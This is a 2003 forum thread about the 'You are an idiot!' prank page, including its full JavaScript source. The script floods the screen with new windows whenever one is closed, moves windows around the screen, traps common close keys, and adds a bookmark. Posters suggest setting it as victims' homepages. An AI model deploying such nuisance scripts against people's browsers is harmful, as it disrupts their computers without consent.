Log in

View Full Version : Umm, yup, that's annoying, ermm....


a_pond_sturgeon
05-21-2003, 12:12 PM
Hehe found a little amusing 'toy' it sucks when you discover it, but then it's pretty damn funny, and even funnier to use on ur friends.
Anyways, here's the link, click on it you'd like, or don't, it's fun =)

DON'T CLICK HERE (http://www.feetman.com/index3.html)

haha, well, curiosity killed the cat, yes we beat terris and saryrn, check for updates, more lootz ss's coming soon, its phat. ~

Phalanixx
05-21-2003, 12:33 PM
I wont give it away but man is that anoying. :twisted:

Eggroll
05-21-2003, 01:57 PM
I thank my firewall for stop internet activity option :-p

BLOOD_kane
05-21-2003, 02:40 PM
what is it?

Eggroll
05-21-2003, 02:53 PM
click it ;)

DeletedUser
05-22-2003, 04:43 AM
function procreate(){
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
}

That's all you need to see.

use the URL 'view-source:http://website.goes.here' to view a web pages source without loading it in your browser.

Bardboy
05-22-2003, 05:04 AM
I particularly like the feature that accelerates it when you go for the close button. Also, try closing it from your taskbar. :lol:

p.s. this is great for getting even with someone at work. especially if they have a sound card. Super Glue the volume to high and make that url the home page! Weeee!

BLOOD_kane
05-22-2003, 10:37 AM
well i found somthing interesting that edits your registry to where people can access your computer...good thing i know how to fix it

Eggroll
05-22-2003, 06:08 PM
How can you fix that? cause i think i have it =\

Raex_The_Overlord
05-30-2003, 07:24 AM
YOOOOOOOOOOOOOOU BASTARD!!!!!!!!!!!!

I'm going to my cousins house this weekend......BWUAHAHAHAHAHA, I will turn his volume to max, put it at his homepage...And I shall have my revenge for the prank he did to me 2 weeks ago :twisted:

Mortamer
05-30-2003, 08:42 AM
well i found somthing interesting that edits your registry to where people can access your computer...good thing i know how to fix it
is this a joke? I'm dieing to click it :)

a_Guest03
05-30-2003, 08:44 AM
I wouldn't click any of the links on this thread if I were you.

a_pond_sturgeon
05-30-2003, 10:22 AM
Lol, it's just a simple amusing "site". Ya know, have some fun with some eqmu junkies? Lol, yeah, I wouldn't click links either....those links on guest's signature look suspicious....lol jk guest, just hold your cursor over the link to see the url if ya don't know what it is btw for n00bz hehe, have fun with it....

DaGrahamster
05-30-2003, 01:38 PM
Not that annoying, in my opinion.....there ARE reasons for Ctrl+Alt+Delete, and this is one of em

tyrz
05-30-2003, 11:20 PM
Thank god f

Monrezz
05-31-2003, 04:34 AM
Here's the source:

<html>
<head>
<title>You are an idiot!</title>
<script language=Javascript>

function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="http://www.feetman.com/index3.html";
var title="Idiot!";
window.external.AddFavorite(url,title);
}
}

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;

function openWindow(url){
aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width =180,height=175,titlebar=no,alwaysRaised=yes');
}

function procreate(){
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
}

function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}

function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}

function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}

function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}

function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
if (flagRun == 1){
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
}

</script>
</head>
<body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
<param name=movie value="youare.swf">
<param name=quality value=high>
<embed src="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">
</embed>
</object>
</body>
</html>

It's damn annoying, but funny haha :)

Monrezz
05-31-2003, 04:42 AM
Not that annoying, in my opinion.....there ARE reasons for Ctrl+Alt+Delete, and this is one of em

FYI Ctrl+Alt+Delete doesn't work on it, checkout this from the source:

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }

DaGrahamster
05-31-2003, 05:02 AM
Yeah, ok.....that explains why when i clicked it, i used Ctrl+Alt+Delete to get rid of it

ramza
05-31-2003, 07:30 AM
Not that annoying, in my opinion.....there ARE reasons for Ctrl+Alt+Delete, and this is one of em

FYI Ctrl+Alt+Delete doesn't work on it, checkout this from the source:

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }

something wrong in this code cause it worked for me lol

Lurker_005
05-31-2003, 08:09 AM
For those currious, http://www.feetman.com/youare.swf is just the flash it loads, and would otherwise pop up a bunch of times.